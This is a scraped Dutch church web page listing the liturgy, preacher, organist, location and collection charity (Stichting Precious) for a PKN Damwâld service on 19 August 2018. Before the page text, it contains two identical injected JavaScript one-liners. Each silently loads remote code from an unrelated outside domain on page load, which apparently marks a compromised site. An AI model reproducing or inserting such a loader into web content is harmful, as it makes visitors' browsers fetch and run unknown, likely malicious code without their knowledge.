;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 19 augustus 2018 14:00 uur - PKN Damwâld
zondag 19 augustus 2018
14:00 uur

Kerkdienst zondag 19 augustus 2018 14:00 uur

Informatie

Voorganger:Ds. H.F. de Vries, Dokkum
Organist:Jelte Cuperus
Liturgie
Lied voor de dienst Elb. 186
Welkom
Intochtslied Psalm 42:1,3
Stil Gebed , Bemoediging en Groet
Gebed om de Verlichting met de Heilige Geest
1e Schriftlezing: Psalm 42
We zingen: Elb. 8
2e Schriftlezing: Johannes 7:37-39
We zingen: Gezang 75:5-15
Preek .
We zingen: Gezang 444:2,3
Lezing van de Apostolische Geloofsbelijdenis .
We zingen: Gezang 257
Dankzegging en Voorbeden
Collecte
Slotlied 456:1,2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Stichting Precious

Stichting Precious is in 2010 opgericht door Evert en Louise Bergsma. De stichting is ontstaan door een steeds sterker wordend verlangen om in eigen omgeving op een positieve en praktische manier handen en voeten te geven aan het Evangelie van Jezus Christus. Zij hebben het verlangen om zich in te zetten voor mensen die aan de rand van de samenleving staan, die nauwelijks in hun levensbehoefte kunnen voorzien, mensen met problemen waar ze zelf niet meer uit komen, mensen die moeite hebben met hun onderlinge relaties zoals echtparen, mensen die “beschadigd” zijn of alleen staan. Zij merken dat er veel gebrokenheid is en schaamte om met dit soort problemen voor de dag te komen. Zij merken in hun omgeving dat mensen behoefte hebben aan warmte en genegenheid. Zij merken dat op een laagdrempelige en praktische manier een helpende hand nodig is en dat daardoor contact mogelijk is om de liefde van Jezus Christus uit te dragen en het Evangelie te verspreiden. De naam Precious betekent: Waardevol, omdat voor God ieder mens waardevol, dierbaar en kostbaar is. Ongeacht hoe iemand eruitziet, welke problemen iemand heeft en welke teleurstellingen iemand heeft meegemaakt of hoe beschadigd iemand is: God houdt onvoorwaardelijk veel van Zijn volk. Daarom is het woord van God en hun persoonlijke relatie met Hem de inspiratie en motivatie waarop zij Hem dienen.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds